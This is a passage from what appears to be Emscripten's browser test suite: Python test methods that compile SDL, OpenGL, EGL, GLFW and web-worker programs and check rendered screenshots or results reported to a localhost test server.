message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
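# Shared helper for the EGL tests: compiles test_egl.c with any extra flags passed in
# and expects /report_result?1, so the plain and PROXY_TO_PTHREAD variants below only
# differ in the flags they add.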
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
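# Builds checksummer.c as a web worker that lazily reads /bigfile over chunked
# synchronous XHR from a local test server and reports the checksum of what it read.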
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
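# Illustrative sketch (not required by the test): the same checksum can be reproduced
# by chaining adler32 across the chunk boundaries the server uses, which is the
# property the chunked worker-side reads rely on.
running = zlib.adler32(data[:0])
for offset in range(0, len(data), chunkSize):
  running = zlib.adler32(data[offset:offset + chunkSize], running)
assert (running & 0xffffffff) == checksum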
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
      self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
